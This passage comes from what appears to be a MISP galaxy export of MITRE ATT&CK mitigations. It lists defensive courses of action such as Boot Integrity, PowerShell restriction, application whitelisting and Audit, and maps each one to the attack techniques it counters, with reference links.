mitigates: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify System Image - T1601" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Patch System Image - T1601.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Downgrade System Image - T1601.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Malicious Image - T1204.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="IIS Components - T1505.004" with estimative-language:likelihood-probability="almost-certain"

Table 4311. Table References
Links
https://attack.mitre.org/mitigations/M1045

Boot Integrity - M1046

Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.

The tag is: misp-galaxy:mitre-course-of-action="Boot Integrity - M1046"

View relationships graph

Boot Integrity - M1046 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Bootkit - T1067" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Firmware - T1019" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pre-OS Boot - T1542" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Compromise Hardware Supply Chain - T1195.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify System Image - T1601" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Patch System Image - T1601.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Downgrade System Image - T1601.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="TFTP Boot - T1542.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="ROMMONkit - T1542.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Code Signing Policy Modification - T1553.006" with estimative-language:likelihood-probability="almost-certain"

Table 4312. Table References
Links
https://attack.mitre.org/mitigations/M1046

Scripting Mitigation - T1064

Turn off unused features or restrict access to scripting engines such as VBScript or scriptable administration frameworks such as PowerShell.

Configure Office security settings enable Protected View, to execute within a sandbox environment, and to block macros through Group Policy. (Citation: Microsoft Block Office Macros) Other types of virtualization and application microsegmentation may also mitigate the impact of compromise. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

The tag is: misp-galaxy:mitre-course-of-action="Scripting Mitigation - T1064"

View relationships graph

Scripting Mitigation - T1064 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Scripting - T1064" with estimative-language:likelihood-probability="almost-certain"

Table 4313. Table References
Links
https://attack.mitre.org/mitigations/T1064
https://cloudblogs.microsoft.com/microsoftsecure/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/
https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

Bootkit Mitigation - T1067

Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to perform this action. Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)

The tag is: misp-galaxy:mitre-course-of-action="Bootkit Mitigation - T1067"

View relationships graph

Bootkit Mitigation - T1067 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Bootkit - T1067" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"

Table 4314. Table References
Links
https://attack.mitre.org/mitigations/T1067
http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf
https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process

PowerShell Mitigation - T1086

It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions. When PowerShell is necessary, restrict PowerShell execution policy to administrators and to only execute signed scripts. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration. (Citation: Netspi PowerShell Execution Policy Bypass) Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.

The tag is: misp-galaxy:mitre-course-of-action="PowerShell Mitigation - T1086"

View relationships graph

PowerShell Mitigation - T1086 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"

Table 4315. Table References
Links
https://attack.mitre.org/mitigations/T1086
https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

Timestomp Mitigation - T1099

Mitigation of timestomping specifically is likely difficult. Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to perform timestomping by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Timestomp Mitigation - T1099"

View relationships graph

Timestomp Mitigation - T1099 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Timestomp - T1099" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 4316. Table References
Links
https://attack.mitre.org/mitigations/T1099
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Regsvr32 Mitigation - T1117

Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass whitelisting. (Citation: Secure Host Baseline EMET)

The tag is: misp-galaxy:mitre-course-of-action="Regsvr32 Mitigation - T1117"

View relationships graph

Regsvr32 Mitigation - T1117 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1117" with estimative-language:likelihood-probability="almost-certain"

Table 4317. Table References
Links
https://attack.mitre.org/mitigations/T1117
https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET

InstallUtil Mitigation - T1118

InstallUtil may not be necessary within a given environment. Use application whitelisting configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="InstallUtil Mitigation - T1118"

View relationships graph

InstallUtil Mitigation - T1118 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="InstallUtil - T1118" with estimative-language:likelihood-probability="almost-certain"

Table 4318. Table References
Links
https://attack.mitre.org/mitigations/T1118

CMSTP Mitigation - T1191

CMSTP.exe may not be necessary within a given environment (unless using it for VPN connection installation). Consider using application whitelisting configured to block execution of CMSTP.exe if it is not required for a given system or network to prevent potential misuse by adversaries. (Citation: MSitPros CMSTP Aug 2017)

The tag is: misp-galaxy:mitre-course-of-action="CMSTP Mitigation - T1191"

View relationships graph

CMSTP Mitigation - T1191 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="CMSTP - T1191" with estimative-language:likelihood-probability="almost-certain"

Table 4319. Table References
Links
https://attack.mitre.org/mitigations/T1191
https://msitpros.com/?p=3960

Keychain Mitigation - T1142

The password for the user’s login keychain can be changed from the user’s login password. This increases the complexity for an adversary because they need to know an additional password.

The tag is: misp-galaxy:mitre-course-of-action="Keychain Mitigation - T1142"

View relationships graph

Keychain Mitigation - T1142 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Keychain - T1142" with estimative-language:likelihood-probability="almost-certain"

Table 4320. Table References
Links
https://attack.mitre.org/mitigations/T1142

Launchctl Mitigation - T1152

Prevent users from installing their own launch agents or launch daemons and instead require them to be pushed out by group policy.

The tag is: misp-galaxy:mitre-course-of-action="Launchctl Mitigation - T1152"

View relationships graph

Launchctl Mitigation - T1152 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Launchctl - T1152" with estimative-language:likelihood-probability="almost-certain"

Table 4321. Table References
Links
https://attack.mitre.org/mitigations/T1152

Source Mitigation - T1153

Due to potential legitimate uses of source commands, it’s may be difficult to mitigate use of this technique.

The tag is: misp-galaxy:mitre-course-of-action="Source Mitigation - T1153"

View relationships graph

Source Mitigation - T1153 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Source - T1153" with estimative-language:likelihood-probability="almost-certain"

Table 4322. Table References
Links
https://attack.mitre.org/mitigations/T1153

Trap Mitigation - T1154

Due to potential legitimate uses of trap commands, it’s may be difficult to mitigate use of this technique.

The tag is: misp-galaxy:mitre-course-of-action="Trap Mitigation - T1154"

View relationships graph

Trap Mitigation - T1154 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Trap - T1154" with estimative-language:likelihood-probability="almost-certain"

Table 4323. Table References
Links
https://attack.mitre.org/mitigations/T1154

HISTCONTROL Mitigation - T1148

Prevent users from changing the <code>HISTCONTROL</code> environment variable (Citation: Securing bash history). Also, make sure that the <code>HISTCONTROL</code> environment variable is set to “ignoredup” instead of “ignoreboth” or “ignorespace”.

The tag is: misp-galaxy:mitre-course-of-action="HISTCONTROL Mitigation - T1148"

View relationships graph

HISTCONTROL Mitigation - T1148 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="HISTCONTROL - T1148" with estimative-language:likelihood-probability="almost-certain"

Table 4324. Table References
Links
https://attack.mitre.org/mitigations/T1148
http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory

Defacement Mitigation - T1491

Implementing best practices for websites such as defending against [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) (Citation: OWASP Top 10 2017). Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. (Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

The tag is: misp-galaxy:mitre-course-of-action="Defacement Mitigation - T1491"

View relationships graph

Defacement Mitigation - T1491 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Defacement - T1491" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="External Defacement - T1491.002" with estimative-language:likelihood-probability="almost-certain"

Table 4325. Table References
Links
https://attack.mitre.org/mitigations/T1491
https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/

AppleScript Mitigation - T1155

Require that all AppleScript be signed by a trusted developer ID before being executed - this will prevent random AppleScript code from executing (Citation: applescript signing). This subjects AppleScript code to the same scrutiny as other .app files passing through Gatekeeper.

The tag is: misp-galaxy:mitre-course-of-action="AppleScript Mitigation - T1155"

View relationships graph

AppleScript Mitigation - T1155 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="AppleScript - T1155" with estimative-language:likelihood-probability="almost-certain"

Table 4326. Table References
Links
https://attack.mitre.org/mitigations/T1155
https://www.engadget.com/2013/10/23/applescript-and-automator-gain-new-features-in-os-x-mavericks/

Sudo Mitigation - T1169

The sudoers file should be strictly edited such that passwords are always required and that users can’t spawn risky processes as users with higher privilege. By requiring a password, even if an adversary can get terminal access, they must know the password to run anything in the sudoers file.

The tag is: misp-galaxy:mitre-course-of-action="Sudo Mitigation - T1169"

View relationships graph

Sudo Mitigation - T1169 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Sudo - T1169" with estimative-language:likelihood-probability="almost-certain"

Table 4327. Table References
Links
https://attack.mitre.org/mitigations/T1169

Hooking Mitigation - T1179

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all hooking will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

The tag is: misp-galaxy:mitre-course-of-action="Hooking Mitigation - T1179"

View relationships graph

Hooking Mitigation - T1179 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Hooking - T1179" with estimative-language:likelihood-probability="almost-certain"

Table 4328. Table References
Links
https://attack.mitre.org/mitigations/T1179

Pre-compromise - M1056

This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.

The tag is: misp-galaxy:mitre-course-of-action="Pre-compromise - M1056"

View relationships graph

Pre-compromise - M1056 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Gather Victim Host Information - T1592" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Client Configurations - T1592.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Software - T1592.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials - T1589.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Active Scanning - T1595" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Scanning IP Blocks - T1595.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Firmware - T1592.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hardware - T1592.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Gather Victim Identity Information - T1589" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Employee Names - T1589.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Gather Victim Network Information - T1590" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DNS - T1590.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Properties - T1590.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="IP Addresses - T1590.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Security Appliances - T1590.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Topology - T1590.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Trust Dependencies - T1590.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Gather Victim Org Information - T1591" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Business Relationships - T1591.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Determine Physical Locations - T1591.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Identify Business Tempo - T1591.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Identify Roles - T1591.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Search Closed Sources - T1597" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Purchase Technical Data - T1597.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Threat Intel Vendors - T1597.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Search Open Technical Databases - T1596" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="CDNs - T1596.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1596.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DNS/Passive DNS - T1596.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Scan Databases - T1596.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="WHOIS - T1596.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Search Open Websites/Domains - T1593" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Search Engines - T1593.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Social Media - T1593.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Search Victim-Owned Websites - T1594" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Acquire Infrastructure - T1583" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Botnet - T1583.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DNS Server - T1583.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Server - T1583.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1583.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Establish Accounts - T1585" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Email Accounts - T1586.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1586.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Compromise Infrastructure - T1584" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Botnet - T1584.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DNS Server - T1584.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domains - T1584.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Server - T1584.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1584.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Services - T1584.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Develop Capabilities - T1587" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1587.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1587.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploits - T1587.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Obtain Capabilities - T1588" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1588.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1588.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Malware - T1588.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploits - T1588.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Vulnerabilities - T1588.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Compromise Accounts - T1586" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Upload Malware - T1608.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Upload Tool - T1608.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Target - T1608.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Stage Capabilities - T1608" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Install Digital Certificate - T1608.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Link Target - T1608.005" with estimative-language:likelihood-probability="almost-certain"

Table 4329. Table References
Links
https://attack.mitre.org/mitigations/M1056

Antivirus/Antimalware - M1049

Use signatures or heuristics to detect malicious software.

The tag is: misp-galaxy:mitre-course-of-action="Antivirus/Antimalware - M1049"

View relationships graph

Antivirus/Antimalware - M1049 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1194" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1193" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Software Packing - T1045" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1215" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1547.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

Table 4330. Table References
Links
https://attack.mitre.org/mitigations/M1049

Attestation - M1002

Enable remote attestation capabilities when available (such as Android SafetyNet or Samsung Knox TIMA Attestation) and prohibit devices that fail the attestation from accessing enterprise resources.

The tag is: misp-galaxy:mitre-course-of-action="Attestation - M1002"

View relationships graph

Attestation - M1002 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Modify OS Kernel or Boot Partition - T1398" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1576" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Command-Line Interface - T1605" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hooking - T1617" with estimative-language:likelihood-probability="almost-certain"

Table 4331. Table References
Links
https://attack.mitre.org/mitigations/M1002

Audit - M1047

Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.

The tag is: misp-galaxy:mitre-course-of-action="Audit - M1047"

View relationships graph

Audit - M1047 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="File System Permissions Weakness - T1044" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1145" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Path Interception - T1034" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify Existing Service - T1031" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1161" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Policy Modification - T1484" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1073" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Access Token - T1527" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Server Software Component - T1505" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Implant Internal Image - T1525" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="At (Linux) - T1053.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Launchd - T1053.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SQL Stored Procedures - T1505.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1546.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"
